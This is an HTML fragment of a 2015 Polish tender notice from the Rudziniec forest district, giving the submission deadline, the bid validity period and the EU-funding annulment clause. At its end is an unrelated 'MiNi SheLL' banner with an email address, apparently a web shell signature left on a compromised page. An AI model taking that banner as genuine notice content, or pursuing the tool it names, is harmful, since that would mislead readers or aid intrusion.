    Nadleśnictwo Rudziniec 44-160 Rudziniec ul. Leśna 7 (Sekretariat), 
    w nieprzekraczalnym terminie do dnia: 20.11.2015 r. godz. 13:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com